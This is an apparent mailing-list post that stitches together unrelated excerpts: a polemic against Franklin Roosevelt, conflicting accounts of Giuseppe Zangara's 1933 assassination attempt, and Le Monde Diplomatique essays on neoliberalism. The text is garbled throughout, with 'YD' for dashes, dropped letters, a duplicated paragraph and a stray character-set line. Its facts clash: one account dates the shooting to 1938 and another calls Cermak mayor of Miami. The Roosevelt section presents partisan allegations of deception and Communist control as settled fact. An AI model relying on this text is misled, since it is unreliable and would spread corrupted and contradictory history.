in the notion that he could thus soften
Stalin. It is all the more incredible when we remember that the things
he was laying in Stalin's lap were the
existence of little nations and the rights of little peoples we had
sworn to defend. And when Truman and
Byrnes went to Potsdam what confronted them was an appalling mess.

Roosevelt not only made agreements secret from the people but secret
from his
closest advisers in the government. He made agreements with Stalin
hostile to the objectives of Churchill and
kept secret from Churchill. He made secret agreements with Chiang KaiYDshek,
secret from both Churchill and
Stalin, and secret agreements in derogation of Chiang KaiYDshek's interests
without his knowledge. And he made
many secret agreements which no one in our State Department knew about
until his death and then learned
about them the hard way, by having them flung in their faces at embarrassing
moments by Molotov. 

At the end of all this, Russia held in her hands a vast belt of land
running from the Baltic sea in the north to the
Black Sea in the south, comprising eleven nations with a population
of 100 million people. These she held, not
as parts of the Soviet Union, but as puppet states, presided over by
Red Quislings of Stalin's own selection
who represented him and not the people they governed, any more than
Quisling represented the people of
Norway. 

The truth is that Roosevelt was a dying man when he was elected, that
many of those around him knew it, that
the most elaborate care was exercised to conceal the fact from the
people and that the misgivings of those who
observed it were justified by events, since he died less than three
months after his fourth inauguration. The
progress of that illness and the means employed to deceive the people
must be examined. 

Rear Admiral Ross T. McIntire, his official physician, felt called
upon to put in a book his formal apologia.

He was a naval officer employed by the people to watch
over the President's health and these statements had the effect of
deceiving the employers of the President and
of the Admiral YD namely the people. 

What disease Roosevelt suffered from at Hyde Park and later, that produced
such grave consequences, we do
not know save upon the statements of Dr. McIntire. Many other doctors
were called in to examine the patient,
but none of these men has ever made any statements. However, while
the illness seemingly began at Hyde Park
after the return from Teheran, there is at least some evidence that
he was far from sound before that time. Three
men have written about the trip to Cairo and Teheran YD Dr. McIntire,
Mike Reilly, chief of the President's Secret
Service guard, and Elliott Roosevelt. The President went to Cairo by
sea. But he wanted to fly from there to
Teheran. Reilly tells us that Admiral McIntire "did not want to submit
some of the members of the party to the
rigors of high altitude flight" but that "the President was not one
of these members."112 And McIntire
volunteers the information that Roosevelt suffered no discomfort on
high altitude flights and had shown no
signs of anoxemia when flying at altitudes of 10,000 to 12,000 feet.113
ou might suppose from this Roosevelt
was quite a flier. et he had never been in a plane since he flew to
Chicago for his first acceptance speech 11
years before until he made the trip to Casablanca YD his only flight
while President before Teheran. However,
Elliott Roosevelt in his book defeats these yarns. He tells how McIntire
was worried about Father's projected
flight. "I'm serious, Elliott," says McIntire. "I think he could fly
only as far as Basra and then go on by train."
Elliott wanted to know what height his father might fly, to which McIntire
replied: "Nothing over 7500 feet YD and
that's tops."114 

Elliott talked to the President's proposed pilot, Major Otis Bryan
who, with Mike Reilly, made an inspection
flight from Teheran to Basra and back and reported that the trip could
be made without going higher than 7000
feet, which, says Elliott, "pleased Father very much."115 Thus McIntire
and Reilly are both caught redYDhanded
misleading their readers. This was before Teheran. 

Elliott talked to the President's proposed pilot, Major Otis Bryan
who, with Mike Reilly, made an inspection
flight from Teheran to Basra and back and reported that the trip could
be made without going higher than 7000
feet, which, says Elliott, "pleased Father very much."115 Thus McIntire
and Reilly are both caught redYDhanded
misleading their readers. This was before Teheran. 

Whatever malady struck Roosevelt down at Hyde Park in December and
kept him pretty much out of circulation
until nearly the middle of May, 1944, we know that McIntire at that
time caused a heart specialist from Boston
to be inducted into the service to remain continuously at Roosevelt's
side and that this heart specialist, Dr.
Howard Bruenn, said a year later at Warm Springs that he "never let
Roosevelt out of his sight," which is a
most unusual performance in the case of a patient whose "stout heart
never failed him," as Dr. McIntire puts it

A great mystery surrounded this illness.

. He was dying slowly at first, rapidly later. And at his side as his
chief adviser was
another dying man YD Harry Hopkins. Hopkins had had a portion of his
stomach removed for ulcers and what
was known as a gastroYDenterotomy performed. After this his liver troubled
him and the gall bladder failed to
supply satisfactorily the essential bile necessary to digestion. 

These two dying men, floating slowly out of life, were deliberately
put into power through a fourthYDterm election by a carefully arranged
deception practiced upon the American
people and upon some, at least, of the party leaders. Here was a crime
committed against a great nation which
had made tremendous sacrifices and against the peace and security of
the world in a moment of the gravest
danger. History will pronounce its verdict upon all who were guilty.

Dr. McIntire was immediately notified of the stroke in
Washington and he, Mrs. Roosevelt and Steve Early left at once by plane
for Warm Springs, arriving there at
11 P.M. They immediately decided to have no autopsy. The body was consigned
to its coffin and orders issued
not to open it. It was taken from Warm Springs next morning at 9 o'clock.
It reached Washington next day YD the
14th YD and after lying for a few hours without ever being opened was
taken that night to Hyde Park for
interment next day. It has been the custom in the past for the remains
of deceased Presidents to lie in state in
the Capitol. This was not done.

Present in the cottage when the President was stricken were the artist,
Mrs.
Schoumantoff, who was painting his portrait, his two cousins, his valet
and several others. The artist, a
Russian, was ordered to leave at once. She took a train without delay
and was not located until two days later
at Locust Valley, L.I.

At St. Helena the British government provided its illustrious
prisoner, Napoleon I, with a physician. He was Dr. Francesco Antomarchi,
a Corsican, who however, did not
seem particularly fond of his fallen countryman and who failed signally
to win Napoleon's confidence. Dr.
Antomarchi persisted to the end in the belief that his royal patient
was not seriously ill. Napoleon convinced
himself that his physician did not know what he was doing and that
the medicines he was prescribing were
actually injuring him. Napoleon watched his chance and when the doctor's
back was turned, handed the mixture
just prepared for him to an aide who swallowed it and was immediately
taken with a violent internal disturbance.
The Emperor denounced Antomarchi as an assassin. Dr. MacLaurin,126
who has written interestingly of this
case, observes that from the symptoms now known to be present and even
in the then state of medical
knowledge at that period, the veriest blockhead would have known that
the Emperor was seriously ill.
Napoleon died shortly after the incident described above of cancer
of the stomach. In this case, instead of
passing up the autopsy, Antomarchi performed one himself in order to
prove that there were no symptoms
present to inform him of the presence of cancer and he wrote a book
upon the subject. 

He did not restore our economic system to vitality. He
changed it. The system he blundered us into is more like the managed
and bureaucratized, stateYDsupported
system of Germany before World War I than our own traditional order.
Before his regime we lived in a system
which depended for its expansion upon private investment in private
enterprise. Today we live in a system
which depends for its expansion and vitality upon the government. This
is a preYDwar European importation YD
imported at the moment when it had fallen into complete disintegration
in Europe. In America today every
fourth person depends for his livelihood upon employment either directly
by the government or indirectly in
some industry supported by government funds. In this substituted system
the government confiscates by
taxes or borrowings the savings of all the citizens and invests them
in nonYDwealthYDproducing enterprises in
order to create work. Behold the picture of American economy today:
taxes which confiscate the savings of
every citizen, a public debt of 250 billion dollars as against a preYDRoosevelt
debt of 19 billions, a government
budget of 40 billions instead of four before Roosevelt, inflation doubling
the prices and reducing the
lowerYDbracket employed workers to a state of pauperism as bad as that
of the unemployed in the depression,
more people on various kinds of government relief than when we had
11 million unemployed, Americans
trapped in the economic disasters and the political quarrels of every
nation on earth and a system of permanent
militarism closely resembling that we beheld with horror in Europe
for decades, bureaucrats swarming over
every field of life and the President calling for more power, more
priceYDfixing, more regulations and more billions.
Does this look like the traditional American scene? Or does it not
look rather like the system built by Bismarck
in Germany in the last century and imitated by all the lesser Bismarcks
in Europe? 

He changed our political system with two weapons YD blankYDcheck congressional
appropriations and blankYDcheck congressional legislation. In 1933,
Congress abdicated much of its power when
it put billions into his hands by a blanket appropriation to be spent
at his sweet will and when it passed general
laws, leaving it to him, through great government bureaus of his appointment,
to fill in the details of legislation

He used it to break down the power of
Congress and concentrate it in the hands of the executive. The end
of these two betrayals YD the smashing of
our economic system and the twisting of our political system YD can
only be the Planned Economic State, which,
either in the form of Communism or Fascism, dominates the entire continent
of Europe today. The capitalist
system cannot live under these conditions. The capitalist system cannot
survive a Planned Economy. Such an
economy can be managed only by a dictatorial government capable of
enforcing the directives it issues. The
only result of our present system YD unless we reverse the drift YD must
be the gradual extension of the fascist
sector and the gradual disappearance of the system of free enterprise
under a free representative government. 

how has it advanced the cause of democracy? We liberated Europe
from Hitler and turned it over to the mercies of a far more terrible
tyrant and actually tried to sell him to the
people as a savior of civilization. Behold Europe! Does one refer to
the wreckage there as liberation and
salvation? Is anyone so naive as to suppose that democracy and free
capitalism have been restored in Europe?
Fascism has departed from Germany, but a hybrid system of socialism
and capitalism in chains has come to
England, which is called social democracy but is on its way to Fascism
with all the controls without which such
a system cannot exist. And in America the price of the war is that
fatal deformity of our own economic and
political system which Roosevelt effected under the impact of the war
necessities. 

The war rescued him and he seized upon it like a drowning man. By leading
his country into the fringes of the war at first and then deep into
its center all over the world he was able to do
the only things that could save him YD spend incomprehensible billions,
whip up spending in the hot flames of
war hysteria, put every man and his wife and grandparents into the
war mills, while under the pressure of
patriotic inhibitions, he could silence criticism and work up the illusion
of the war leader. 

Look up the promises he made, not to our own people, but to the Chinese,
to Poland, to
Czechoslovakia, to the Baltic peoples in Lithuania and Latvia and Estonia,
to the Jews out of one side of his
mouth and to the Arabs out of the other side. He broke every promise.

The figure of Roosevelt exhibited before the eyes of our people is
a fiction. There was no such being as that
noble, selfless, hardYDheaded, wise and farseeing combination of philosopher,
philanthropist and warrior which
has been fabricated out of pure propaganda and which a small collection
of dangerous cliques in this country
are using to advance their own evil ends. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~

In June the longYDawaited invasion of the continent was launched. With
this we will not concern ourselves. The
other subject that occupied Roosevelt's mind was his plan to have himself
renominated for a fourth time. 

The President had lost his head, at least a little. Congress was slipping
away from him. A growing section of his
party, particularly in the Senate, was moving out of that collection
of incongruous elements called the Third
New Deal. It was crawling with Reds and their gullible allies who got
themselves into key positions in all the
bureaus and were talking with great assurance about what they were
going to do with America and the world.
The Communists had all become antiYDfascists and everybody who was against
the Communists was, therefore,
a fascist. A group of organizations financed by undisclosed benefactors
was riding roughshod through the
country smearing everybody who questioned the grandiose plans of the
Great Leader for remaking America
and the world. Nobody was getting a hotter dose of this smearing than
the American Congress. The radio and
the frightened press and magazines kept up a barrage against the members
of the President's own party in both
houses. 

It was a Democratic bill and the blast that exploded in his face brought
him up with a jerk. In the upper house, Senator Barkley, Democratic
leader, Roosevelt's own representative
there, rose to upbraid him. He said the message was "a calculated and
deliberate assault upon the legislative
integrity of every member of Congress." He cried: "I do not propose
to take it lying down," as Democratic and
Republican senators united in a roar of applause. He ended his philippic
with an announcement that made
headlines in every paper in the country. He declared that after seven
years of carrying the New Deal banner for
the President, he now resigned his post as Democratic majority leader
and he called on every member of the
Congress to preserve its selfYDrespect and override the veto. The Senate
overrode it 72 to 14 and the House 299
to 95. It brought Roosevelt tumbling off his high horse. He sent Steve
Early running to Barkley's home that
very night to beg him not to quit. Barkley yielded. 

McIntire was a naval doctor in 1932 and was recommended to
Roosevelt as White House physician by Admiral Grayson. McIntire was
an eye, ear and nose specialist. He got
along famously with Roosevelt, was elevated by him to the grade of
admiral and made head of the Naval
Hospital Service. 

Thus once again the problem of disease entangled itself in the making
of history. 

It had happened after the First World War when the President was stricken
by a brain
hemorrhage that paralyzed his body and impaired his mind and, worse
than this, disturbed his normal mental
balance. What might have been the course of history had Woodrow Wilson's
mental and physical powers
survived must be a matter of speculation. 

We have seen how the Communist party had successfully penetrated the
unions organized by the Congress of
Industrial Organizations YD the CIO YD and how John L. Lewis and David
Dubinsky had got out of it for this
reason, leaving Sidney Hillman in complete control. We have also seen
how the war brought Hillman to the top
in White House circles when he and William Knudsen became the directors
of the economic war effort.
Knudsen departed in good time, but Hillman remained close to the White
House. 

. By 1943, Earl Browder, Communist
leader, had about completed the discovery that there was no hope for
a proletarian revolution in America. The
party got nowhere preaching Communism. The people just wouldn't listen.
But it learned that it could getyYYY   

  
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXZ[\]^_`abcdefghijklmno
pqrstuvwxyz{}yYYY~Y~
very
far by using a different technique. After all, Communist revolutionaries
know that before they can introduce
Communism they must destroy the political and economic system of the
country in which they conspire. 

t fascism YD the Planned Capitalist Economy
YD is merely a decadent phase of capitalism. For this reason the Communist
party had been promoting with great
success RedYDfront organizations and inducing the most important people,
like Mrs. Roosevelt, Henry Wallace
and scores of prominent leaders in education and public life, to work
with them. 

As 1944 opened, Browder decided to liquidate the Communist party. It
would go out of politics. It would
become a mere educational association. This was done, and Browder and
Sidney Hillman teamed up to capture
the American Labor Party. This had been formed originally in New ork
City to provide a political vehicle for
Fiorello LaGuardia in his local politics. It had all sorts of people
in it. There were a lot of Reds, a lot of socialists
and a lot of parlor and campus pinks of all sorts, plus a lot of social
reformers and welfare reformers. It had
corralled a lot of votes YD enough to swing an election in New ork
State YD by giving or withholding its vote
from the Democrats. It supported Lehman in 1940 and elected him on
the Democratic ticket. It refused to
endorse the Democratic candidate, Bennett, for governor in 1942 and
the Democratic vote, without it, was
insufficient and thus Dewey became governor. Now Browder and Hillman
joined forces and decided to take
over the American Labor Party. They met resistance from the mixed collection
of pinks who had control, but in
a bitter battle Browder and Hillman took it over. Actually Browder
dominated this team because it was
Communist votes that did the trick. 

In addition to this, Hillman had organized in 1943 a new political
labor group called the CIO Political Action
Committee. The CIO had violated the law by supporting candidates in
various primary elections and to get
around this Hillman formed this Political Action Committee and pressure
was put on members of CIO unions to
compel them to join. This organization was now being used as a club
in the Democratic party to bludgeon
Democratic congressmen and officials generally to play ball with Hillman,
Wallace and their crowd, while
Hillman and Browder did business as a team in New ork State in the
newly reYDformed Communist American
Labor Party. 

The Democratic party could win if it could carry the Southern states
and in addition New ork, Massachusetts,
Illinois, Michigan and New Jersey. These states could be carried with
the support of Sidney Hillman's Political
Action Committee and Browder's American Labor Party, but not without
them and Roosevelt was the only
possible candidate who could get this support. The Democrats had to
nominate Roosevelt or lose the election.
There were some Democrats who thought it was better to lose the election,
but not enough of them.
Accordingly when the convention assembled in Chicago on July 19, Sidney
Hillman was there, not as a
delegate YD he was not even a member of the party YD but to see that
the subservient Democrats behaved to his
satisfaction and to the satisfaction of his friend and partner, Browder.
To this pass had Roosevelt's personal
political ambitions brought the Democratic party of Jefferson, Cleveland
and Wilson. Hillman had a
headquarters there. He wasn't worried about Roosevelt's nomination.
That was settled. He wasn't worried about
the platform. That was written to his satisfaction before the convention
assembled by Sam Rosenman. He had
one more demand. He wanted Henry Wallace nominated again for Vice President.

Harry Hopkins and Henry Wallace and, of course, Sidney Hillman
knew. They knew that Roosevelt was doomed and that if they could name
Henry Wallace Vice President this
time, the government would be in their hands. 

But Chicago had a visitor about whom nothing was known until later.
On the evening of July 14, Roosevelt left
Washington with great secrecy on a special train. It reached Chicago
on Saturday the 15th. That same day,
Robert E. Hannegan, Democratic national chairman, got to Chicago. Reporters
awaited him at the station. But
he slipped out through a rear door of his train and into Mayor Kelly's
policeYDescorted automobile and vanished.
Reporters frantically hunted him all over town. He remained out of
sight until the next day. But in the meantime
he had made a visit to Roosevelt's train, secretly parked on a remote
railroad siding. There poor Wallace's
goose was cooked. Hannegan, too, got a letter. It said the President
would be happy to have either Harry
Truman or William Douglas as his running mate. And as Hannegan was
leaving the train, Roosevelt warned
him "to clear everything with Sidney." The Presidential approval of
Truman was no good until Sidney O.K.'d it

Truman was nominated with 1100 votes to only 66 for
Wallace. But not until Sidney Hillman had approved the change. 

His first speech was not made until September 24 to a dinner given
by the International Teamsters'
Union dominated by Daniel Tobin YD an AFL union. Its purpose was to
put some emphasis on the support of the
AFL in view of the bitter feeling among AFL leaders because of the
dominant role Sidney Hillman's CIO was
playing in Roosevelt's councils and particularly in its favored position
before Roosevelt's Labor Board
~~~~~~~~~
Secret Service Page-

The first occurred on February 1, 1933, in Miami, Florida Giuseppe
Zangara fired five
shots a President-elect Franklin D. Roosevelt, who was making an impromptu
speech while sitting
in an open car that had stopped momentarily. Although none of the shots
hit President Roosevelt,
Zangara mortally wounded Anton Cermak, the Mayor of Chicago, and hit
four other people,
including a Secret Service agent.

On February 15, 1933, Zangara attended
a speech given by Roosevelt at Bayfront Park in Miami, Florida.
When Roosevelt had finished his talk and was preparing to leave,
Zangara pulled out a pistol and opened fire. A bystander
deflected the assassin's aim by pushing his arm into the air.
Zangara wounded five people who had been near the
president-elect, two of them seriously. Most critically injured was
Chicago Mayor Anton Cermak, who was struck by the bullet in
the chest which then lodged in his spine. 

Zangara was immediately charged with four counts of attempted
murder. He was not charged initially with the wounding of
Cermak, as authorities waited to see if the mayor's wounds
would prove fatal. The State charged Zangara for attempting to
murder Franklin Roosevelt, Russell Caldwell, Margaret Kruise,
and William Sinnott. Zangara was found guilty on each count and
sentenced to four consecutive twenty year terms. 

On March 6, Mayor Cermak died from complications stemming
from the shooting. The same day Zangara was indicted by a
grand jury and charged with first degree murder in the death of
Cermak. His trial began on March 9 and ended on March 11
with a guilty verdict and a death sentence. The prisoner was
transported to the Florida State Prison at Raiford, where he was
executed on March 20, 1933. 

The parade car moved slowly down the street as President-elect Roosevelt
and Mayor Cermak
smiled and waved. The car stopped and President-elect Roosevelt gave
a speech while sitting on
the back of the car. A man named Guiseppe Zangara pushed through the
crowd. He fired five
shots at the President-elect. The bullets hit four people and Mayor
Cermak. The mayor fell out of
the car and called out "The President, get him away!" But Roosevelt
ordered his car to stop and
that Mayor Cermak be put in with him. President-elect Roosevelt held
Mayor Cermak all the way
to the hospital.

Mayor Anton J. Cermak died three weeks later, on March 8, 1933. His
body was taken back to
Chicago and buried in the Bohemian National Cemetery.

Guiseppe Zangara was executed in the electric chair on March 21, 1933.
That was only 13 days
after Mayor Cermak died.

It was not always thus. Consider the case of Guiseppe Zangara, who
was executed in 1933 for the
attempted assassination of President-elect Franklin D. Roosevelt in
which Chicago Mayor Anton
J. Cermak was fatally shot. Zangara pleaded guilty in state court on
March 10, was sentenced to
death, and was executed on March 20 -- an interval of 10 days! Kenneth
J. Davis, FDR: The
New ork ears 1928-1933 (Random House, 1985) at 427-435.

After Roosevelt had delivered a
speech in Florida on February 14, 1938, Guiseppe Zangara, an unemployed
bricklayer, fired six
sbots from a handgun at Roosevelt from twelve yards away. The president
elect, who was sitting
in an open car, was uninjured but five other people were shot, including
Chicago mayor Anton
Cernak, who was killed. Zangara, who had a pathological hatred for
rich and powerful figures,
was found guilty of murder and electrocuted.February 15, 1933, Guiseppe
Zangara rose early in Miami, Florida to assassinate Franklin
Delano Roosevelt, president-elect. In the past weeks, FDR's popularity
had increased. That
warm, reassuring voice, that ready grin and tilted cigarette holder,
had reached out to touch
millions of folks all over America. Zangara did not share these emotions.
Pushing his way through
the crowd, Zangara shouted out "There are too many people starving
to death!" He fired shot after
shot at FDR, but a woman's quick move knocked the gun upward. The bullets
hit several
bystanders and mortally wounded Mayor Cermak of Miami. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:14:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR5
Message-ID: <009C9C7C.4404B7E0.11@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


On March 21, 1933, Zangara marched into the execution chamber shouting
against the
"capitalists" and expressing disappointment that no news camera-men
were permitted to witness
his execution. "Goodbye, adios to the world," were his last words.

3 
FDR's Looking Forward published

FDR is shot at in assassination attempt in Miami, Florida, by Guiseppe
Zangara, 15
February

Giuseppe Zangara was sentenced to serve 80 years for shooting at President
elect Franklin
Roosevelt in 1933. Though Roosevelt was missed, five bystanders, including
Chicago Mayor
Anton Cermak, were struck. Three weeks after the attack, Cermak died
of complications.
Zangara's sentence was then changed to death sentence. Thirty-three
days after the attack,
Zangara was strapped into the electric chair at Florida's Raiford Prison.
He glared at his
executioners and declared, "Goodbye, adios to all the world." His unclaimed
body was buried
in an unmarked prison grave.

In 1989, as part of an effort by court officials to recover missing
court files of
historical significance, he filed an FOIA request with the U.S. Secret
Service
seeking to get back court files concerning assassin Giuseppe Zangara.

Zangara, a 32-year-old bricklayer, fired four shots at President-elect
Franklin
Roosevelt's motorcade in 1933 in Miami. Chicago Mayor Anton Cermak
was
killed and four people were wounded. Roosevelt escaped unharmed. Zangara
was found guilty of murder and was executed about a month later.

Winslow said a Miami court order showed that a Secret Service agent
had
checked out Zangara's death warrant and some other court documents
in 1954
but never had returned them. Unfortunately, he said, the FOIA request
failed to
turn up the missing documents.

GIUSEPPE
ZANGARA
pleaded guilty and
was executed
March 20, 1933 for
the March 7, 1933
death of Chicago
Mayor Anton
Cermak, who was
fatally wounded in
an attempt on the
life of
President-elect
Franklin D.
Roosevelt in
Miami on Feb. 15,
1933. 

LE MONDE DIPLOMATIQUE - May 1998
by DOMINIQUE VIDAL

National and/or social liberation movements worldwide are equally affected.
The
ideology and power bloc which used to be their mainstay, whether they
liked it or
not, has disappeared. The various movements and causes have dropped
out of the
international spotlight and are no longer up for grabs in the East
West confrontation.
In fact, amid general indifference, they have largely forfeited their
means of action and
political leverage. 

With its main enemy out of the way, along with the economic, ideological
and military
threat it represented, the West, led by the United States, has now
become the master
of the world. A damaging result of this new world order has been the
beginning of the
process of globalisation. It is no paradox to say it probably began
on 9 November
1989 with the fall of the Berlin Wall, or in August 1991 when Mikhail
Gorbachev
rallied to the American crusade in the Gulf, or indeed on 8 December
1991, the date
of the dissolution of the Soviet Union

For decades, every socialist project was contrasted with its only existing
embodiment: so-called "real" socialism. And, among revolutionary forces
themselves,
the process of devising a plausible radical alternative was tragically
limited by the
Soviet horizon. 

So, despite the consequences described at the beginning, the fall of
communism
removes a severe handicap. Far from presaging the end of history and
the irrelevance
of radical thought, it actually gives a whole new lease of life to
ideas of utopia. Future
generations will have the freedom to conceive a different kind of society
without
having to define themselves in terms of a communist model. Of course,
there is no
going back to a clean slate. However, with the passing of time, it
should be possible
to learn lessons from the failure of communism and - in other forms
and for other
reasons - social-democratic reformism. The human imagination must find
a new way
of thinking based on what men and women need, rather than theoretical
or dogmatic
concepts to be "implemented". 

The questions we must ask ourselves may have a familiar ring. How are
democracy,
pluralism, rights and freedoms to be revitalised, but sheltered from
totalitarian intent?
How is equality of opportunity and social justice to be guaranteed
and the security to
which people are entitled assured, without a general "dumbing down"
and stifling of
initiative? How can the fulfilment of basic social needs be made into
a priority for the
economy without affecting its development? How can the necessary resources
be
found for a new balance between work, training, family and community
life, and
leisure activities when people's time is at last freed up? How can
the ground be laid
for a distribution of wealth which, worldwide, respects the right of
all peoples to
development? How can the role of the state be made to serve all these
objectives
while at the same time the independence of each citizen and each local
community is
assured? In short, how is the relationship between individuals and
society to be
reinvented? To these and many other questions, there are no longer
any ready-made
answers. 

However, the way is now open and the ground ready to be cleared. At
last. 

Translated by Sally Blaxland

IGNACIO RAMONET

Last January, the corridors of a number of European airports were adorned
with a
poster in the style of the Chinese cultural revolution. It showed a
row of
demonstrators at the head of a march, their faces shining, their colourful
banners
blowing in the wind. The slogan they were chanting was "Capitalists
of the world,
unite!" For Forbes, America's magazine for millionaires, this was more
than a jibe at
the 150th anniversary of the publication of Marx and Engels' Communist
Manifesto. 

It was a way of making two things clear. Apparently without fear of
contradiction, as
the posters were not torn down or defaced. The first is that nobody
is afraid of
communism any longer. The second is that capitalism has gone over to
the attack. 

capitalism's new-found arrogance. 

The triumphal tone became apparent after the fall of the Berlin Wall,
when the Soviet
Union collapsed in a welter of political obtuseness reflecting the
emptiness of
shattered illusions. The sudden revelation of the full consequences
of decades of state
control in the countries of the former Eastern bloc produced a sort
of mental
upheaval. The tragic absurdity of a system lacking basic freedoms and
a market
economy was starkly exposed, as were all the injustices that had followed
in its
wake. Socialist thinking seemed to subside, along with the belief in
progress and a
future subject to rational planning. 

The sole ideological basis of the traditional right had been its anti
communism. The
collapse of the Soviet system and the implosion of socialism cut the
ground from
under its feet. Neoliberalism, which had been flagging since the beginning
of the
century, was left alone in the field, the sole victor of the East-West
confrontation.
With its main rivals removed, it has re-emerged on all sides, stronger
than ever. Its
supporters dream of imposing their vision - a neoliberal utopia admitting
of no
alternative - on the whole world. 

This campaign of conquest goes by the name of globalisation. It is
the outcome of the
increasing interdependence of all countries, brought about by the lifting
of all controls
on the movement of capital, the removal of customs barriers and administrative
restrictions, and the intensification of international commerce and
free trade; all this
under the auspices of the World Bank, the International Monetary Fund,
the
Organisation for Economic Cooperation and Development, and the World
Trade
Organisation. 

The financial economy has become entirely divorced from the real economy.
The sum
total of daily financial transactions throughout the world is about
$1,500 billion, but a
mere 1 % involves the creation of new wealth. 

Even in the most developed countries, the dramatic advance of neoliberalism
has
significantly reduced the role of parliaments and other public players.

At the same time, the growth of new information technologies is proceeding
without
any reference to the idea of social progress. The enormous strides
in molecular
biology since the early 1960s, coupled with the immense calculating
power provided
by computer science, have shattered the stability of the technological
matrix which
public authorities are finding it harder and harder to control. Politicians
can no longer
assess the risks involved in the acceleration of science and technology
(1). Here too,
they are increasingly dependent on unelected experts, who direct the
government
decision-making process behind the scenes. 

The information revolution has torn our society apart. It has overturned
the
established pattern of trade, opening the way for the expansion of
the global and
information economy. Not all the countries of the world have yet been
forced into
one unit. But the global economy is imposing a single economic model
by networking
the entire planet. In this new system of liberal social relations,
humankind has been
reduced to a collection of isolated individuals stranded in a universe
of
hypertechnology. 

These brutal changes are causing us to lose our bearings; there is
ever-growing
uncertainty, the world appears unintelligible and history seems to
defy rational
interpretation. The crisis we are experiencing is what Gramsci had
in mind when he
spoke of the old order dying while the new hesitates to be born. We
are reminded of
Tocqueville's phrase: "When the past no longer illuminates the future,
the spirit walks
in darkness." 

And yet, many people are trying to inject some measure of humanity
into the
relentless machinery of neoliberalism. They feel the need for responsible
involvement
and collective action. In an age when power has become abstract, invisible,
distant
and impersonal, they want to confront those responsible face to face,
to direct their
anger, fears and frustration at clearly identified adversaries of flesh
and blood. They
would still be prepared to believe that politics has an answer to everything,
even
though politicians find it increasingly difficult to propose straightforward
solutions to
the complex problems of society. And they all feel the need to erect
a barrier against
the tidal wave of neoliberalism in the form of a coherent ideology
that can be
opposed to the currently dominant model. 

To formulate that ideology is no easy matter. There is practically
nothing left to build
on. Previous utopias based on the idea of progress have all too often
sunk into
authoritarian rule and oppression. 

Once again, there is a need for dreamers who can think and thinkers
who can dream.
The answer will not be a neatly packaged, custom-built project. It
will be a way of
looking at things, of analysing society, leading gradually to the development
of a new
ideology that will break the stranglehold of anarcho-liberalism. 

*** sog ***
Neoliberal ideology is busily building a society of selfishness based
on fragmentation.
To preserve the future, we have to strengthen the collective dimension
(3). And
collective action is now as much a matter of single-issue campaigns
as of parties and
unions.
*** AoD ***

France has seen a proliferation of campaigning groups in recent years.
The
issues range from food for the homeless (les Restos du Coeur) and the
fight against
AIDS (Act Up), to unemployment (Action contre le ChYmage - AC!) and
housing
rights (Droit au Logement - DAL). There has also been considerable
growth in local
branches of large NGOs like Greenpeace, Amnesty International, MYdecins
du
Monde and Transparency. 

Political parties have two particular attributes which detract from
their credibility.
First, they are all-embracing, claiming to be able to solve all society's
problems.
Second, they are geographically restricted, i.e. they can act only
within the frontiers
of a single country. Campaigning groups have exactly the opposite properties.
On the
one hand they are thematic, i.e. concerned with single issues such
as unemployment,
housing and the environment. On the other, they are international,
i.e. their field of
action is the whole planet (4). 

For many years the supporters of these two different approaches have
been at odds
with each other, but recently there have been signs of convergence.
It is vital that they
join forces. This is one of the key problems of political renewal.
Campaigning groups
are grass-roots organisations, testifying to the richness of social
initiative. 
{John Doe Society - sog}

It is
therefore essential to build strong links between campaigning organisations
and
political parties. 

Campaigning organisations have preserved the belief in the possibility
of changing the
world, a belief based on a radical conception of democracy. They are
the probable
source of a renewal of political activity in Europe. 

. "Today's utopia is tomorrow's
reality", as Victor Hugo said. Lamartine agreed that utopias are simply
"realities
whose time is not yet ripe." It is the committed activists of campaigning
organisations
who are likely to prove them right. They will resurface tomorrow under
other
banners. 

They will be involved in struggles to restore the United Nations' role
as the central
instrument of international law, to turn it into an organisation that
can take real
decisions, act decisively and impose lasting peace; to establish international
tribunals
that can judge crimes against humanity, democracy and the common good;
to prevent
manipulation of the masses and to end discrimination against women.
They will be
present in campaigns to secure new legislation on protection of the
environment and
to establish the principle of sustainable development. In the fight
to ban tax havens
and promote an economic system based on solidarity. And in many others.

Translated by Barry Smerin

Return of the Rebels
The working classes have not given up the fight despite both overt
and covert repression, a
weakened and divided trade union movement and media indifference or
outright hostility.

by CHRISTIAN DE BRIE

Alongside the trade union movement, an astonishing wealth and diversity
of
associations is springing up to challenge the new world order. From
local community
groups to international non-governmental organisations - there are
several hundred
thousand of them in all - mobilising hundreds of millions of activists.
As the Peoples'
Global Action against "Free" Trade and the World Trade Organisation,
which met in
Geneva in February 1998, stated in their manifesto, direct action against
globalisation
is the most important thing. "Only a global alliance of peoples' movements,
respecting
autonomy and facilitating action-oriented resistance, can defeat this
... monster. ...
We assert our will to struggle ... against all forms of oppression"
(3).

Translated by Sally Blaxland

THERE IS ANOTHER, BETTER WORLD

The hazards of internationalism

Billions of men and women, rendered powerless by the
fragmentation of the social struggle, are pinning their hopes on a
new universalism that does not leave the delicate fabric of the
world entirely in the hands of the money men.

by ALAIN GRESH
We live in extraordinary times. Globalisation is carrying all before
it, our means of
communication allow us contact in real time with any place you care
to name, more
people than ever before are travelling the world, yet paradoxically
the media space
devoted to "foreign affairs" is shrinking to vanishing point. All the
research bears this
out. Be it in Paris, Washington (1), London or Madrid, television and
press coverage
of international problems has been substantially reduced. However,
there is an
exception to every rule and we are informed instantly of any drop in
the Nikkei index
in Tokyo, invited to rejoice at the new heights reached by the Dow
Jones on Wall
Street or worry about exchange rate fluctuations in Seoul. Stock exchange
news has
become the only social glue binding the global village together. 

Alain Badiou observes in a stimulating reflection on universalism (3),
this "process of
fragmentation into separate and isolated identities" is only another
aspect of a "world
that has finally been given a configuration, as a market, a world market.
Nothing", he
continues, "lends itself more to the invention of new patterns for
a uniform monetary
system than a community and its territory or territories. What endless
opportunities
for trade and investment" these innumerable new communities offer as
they arise. The
many separate states that have replaced ugoslavia or the Soviet Union
offered no
resistance to the juggernaut of the free market economy. 

As Alain Badiou observes, "at a time of general movement and the dream
of instant
cultural exchange, more and more laws and regulations are being introduced
everywhere to curtail people's freedom of movement ... Free movement
for things
that can be counted, by all means, especially for capital, the very
essence of such
things. But free movement for things that cannot be counted, for the
infinite value
